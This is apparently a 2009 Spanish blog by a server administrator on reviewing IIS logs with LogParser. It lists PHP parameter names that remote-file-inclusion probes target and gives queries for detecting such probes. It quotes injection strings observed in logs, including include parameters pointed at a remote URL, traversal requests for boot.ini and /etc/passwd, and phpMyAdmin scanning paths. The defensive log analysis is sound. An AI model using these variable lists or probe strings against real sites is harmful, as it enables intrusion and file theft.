Variables que se utilizan en los RFI
June 25, 2009
Variables que se utilizan en los RFI:
&glob
&glob[rootDir]
AIbasedir
CLPATH
CMS_ADMIN_PAGE
CONFIG[MWCHAT_Libs]
CONFIG[path]
CONFIG_EXT[LANGUAGES_DIR]
CPG_M_DIR
Cat
Config_rootdir
DIR
DIR_LIBS
FM
GALLERY_BASEDIR
GLOBALS['mosConfig_absolute_path']
GLOBALS[AA_INC_PATH]
GLOBALS[CLPath]
GLOBALS[includeBit]
GLOBALS[language_home]
GLOBALS[mosConfig_absolute_path]
GLOBALS[rootdp]
G_PATH
HCL_path
HTTP_POST_VARS
IP
Include
LOCAL_PATH
LangCookie
MAIN_PATH
ME
PATH
PATH_Includes
PGV_BASE_DIRECTORY
PHORUM[settings_dir]
REX[INCLUDE_PATH]
Server
THEME_DIR
VoteBoxPath
[Home]
_AMGconfig[cfg_serverpath]
_AMLconfig[cfg_serverpath]
_AMVconfig[cfg_serverpath]
_CCFG[_PKG_PATH_DBSE]
_PX_config[manager_path]
_REQUEST
_REQUEST[option]
_SERVER[DOCUMENT_ROOT]
a
absolute_path
act
action
addpoll
adminpath
agendax_path
alpath
apa_module_basedir
app_path
appdir
archive
arquivo
azione
b2inc
baccio
base
baseDir
base_dir
base_path
basepath
bbPath
bbPath[path]
bkpwp_plugin_path
boarddir
c
cal_dir
cfgProgDir
chem_absolu
childwindow.inc.php?form
clarolineRepositorySys
classes_dir
client
cmd
cnkey
coID
component_dir
conf
confdir
config
configFile
config[image_module]
config[include_path]
config[path_admin_include]
config[path_src_include]
config[search_disp]
config_atkroot
configbasedir
cont
content
conteudo
cropimagedir
css_path
custom
cutepath
dPconfig[root_dir]
data
dept
dir[base]
dir[func]
do
dsp
emailreader_ini
eqdkp_root_path
error
f
ff_compath
fil_config
file
file_newsportal
filnavn
fromTemplate
from_market
function
g_meta_inc_dir
g_meta_include_file
glob[rootDir]
go
gorumDir
hc
inc
inc_dir
incdir
includeFooter
includePath
include_dir
include_file
include_location
include_path
includedir
includes_dir
inhalt
kietu[url_hit]
kobr
l
lang
language_dir
layerstyle
left
lg
libpach
libpath
lm_absolute_path
lng
logfile
login
lvc_include_dir
m2f_root_path
m
mainpage
match
meio.php
meio
mode
modpath
module_path]
module_root_path
mosConfig_absolute_path
mosConfig_live_site
myPath
name
newsSync_enable_phpnuke_mod
news_file
nic
noSet
no_connect
nphp_config[LangFile]
o
opcao
open
openfile
openid_root_path
option
ort
p
pag
page
pageurl
pagina
path[docroot]
path_local
path_pre
path_to_bt_dir
path_to_news
pathtoashnews
pg
phgdir
phpAds_path
phpEx
phpbb_root_dir
phpbb_root_path
phpc_root_path
pilih
pivot_path
place
pm_path
pollname
prefix
principal
pun_root
quezza_root_path
rage
relative_script_path
rep
req_path
returnpath
root
root_dir
root_path
rootagenda
rub
s
sayfa
sbp
script_root
seccion
sel
serverPath
server_inc
setmodules
settings[locale]
settings_dir
sfx
show
side
site
site_path
siteurl
smf_root_path
sourcedir
spaw_root
sqld
systempath
t
t_core_path
template
theme_path
thisdir
thispath
tpl_pgb_moddir
url
user_inc
val1
visualizar
vsDragonRootPath
vwar_root2
vwar_root
wkPath
wpPATH
x
xcomicRootPath
xoopsConfig[xoops_url]
xoops_redirect
Consulta para sacar las variables:
logparser “SELECT * FROM ‘C:\logs\*’ where [cs-uri-query] like ‘%=http%’” -i:W3C -o:DATAGRID
Comprobaciones diarias
May 13, 2009
HTTPERR
logparser “SELECT [cs-uri], COUNT(*) AS EXPR1 FROM ‘C:\WINDOWS\system32\LogFiles\HTTPERR\*’ GROUP BY [cs-uri] ORDER BY expr1 desc” -i:HTTPERR -o:DATAGRID
SMTP
logparser “SELECT [cs-uri-query], COUNT(*) AS EXPR1 FROM ‘C:\WINDOWS\system32\LogFiles\A_smtp\SMTPSVC1\*’ GROUP BY [cs-uri-query] ORDER BY expr1 desc” -i:W3C -o:DATAGRID
IIS
logparser “SELECT [cs-uri-stem], COUNT(*) AS EXPR1 FROM ‘C:\WINDOWS\system32\LogFiles\W3SVC1\*’ GROUP BY [cs-uri-stem] ORDER BY expr1 desc” -i:W3C -o:DATAGRID
Más Includes en diferentes variables
May 8, 2009
Consulta para detectar los includes en variables:
SELECT [cs-uri-query], COUNT(*) AS EXPR1
FROM tabla
where (rutalog = ‘c:\a\W3SVC1′) and [cs-uri-query] like ‘%=http%’
GROUP BY [cs-uri-query]
ORDER BY 2 desc
Include en diferentes variables:
mosConfig_absolute_path=http:///photo.gif?
phpbb_root_path=http:///photo.gif?
theme_path=http:///photo.gif?
dir=http:///photo.gif?
baseDir=http:///photo.gif?
config[path_src_include]=http:///photo.gif?
inc_dir=http:///photo.gif?
page=http:///photo.gif?
HCL_path=http:///photo.gif?
Boot.ini
May 8, 2009
Petición del fichero de arraque:
/????/????/????/boot.ini
Consulta:
SELECT [cs-uri-stem], [cs-uri-query]
FROM tabla
where [cs-uri-stem] like ‘%?%’
ORDER BY 1 desc
Passwd
May 8, 2009
Petición de las contraseñas del sistema:
/????/????/????/etc/passwd
Consulta:
SELECT [cs-uri-stem], [cs-uri-query]
FROM tabla
where [cs-uri-stem] like ‘%?%’
ORDER BY 1 desc
Phpmyadmin
May 7, 2009
Entradas repetidas en los log:
/phpmyadmin/main.php
/phpMyAdmin/main.php
/myadmin/main.php
/phpmyadmin2/main.php
/PMA/main.php
/mysql/main.php
/db/main.php
Consulta:
select cs-uri-stem, count (*) as a from ‘\W3SVC1\W3SVC1\*.*’ group by cs-uri-stem order by a desc
Comportamientos extraños
May 4, 2009
Relación de todo lo que ha pasado en el servidor ordenado por fecha para sacar comportamientos extraños:
SELECT Date, [c-ip], [cs(Referer)], [cs-uri-stem], [cs-uri-query], [cs-uri]
FROM tabla
WHERE (Date > ‘2009-04-27′)
ORDER BY Date
Es importante incluir el cs-uri, nos indica las peticiones que han sido rechazadas en el HTTPERR.
SELECT Date, [cs(Referer)], [cs-uri-stem], [cs-uri-query]
FROM tabla
WHERE (Date > ‘2009-04-25′)
ORDER BY Date
¿Dónde van?
May 4, 2009
Vienen de [cs(Referer)] y van a [cs-uri-stem], [cs-uri-query]
SELECT Date, [c-ip], [cs(Referer)], [cs-uri-stem], [cs-uri-query]
FROM tabla
WHERE (Date > ‘2009-04-27′)
ORDER BY [cs(Referer)] DESC
Ejemplo:
30/04/2009 1:25:36 http://www.whois.sc/ /robots.txt -
28/04/2009 9:58:55 http://www.whois.sc/ /robots.txt -
Vienen de whois.sc y van al robots.txt
¿De dónde vienen?
May 4, 2009
En este mes que comienza:
SELECT [cs(Referer)], COUNT(*) AS EXPR1
FROM tabla
WHERE (Date > ‘2009-05-01′)
GROUP BY [cs(Referer)]
ORDER BY [cs(Referer)] DESC
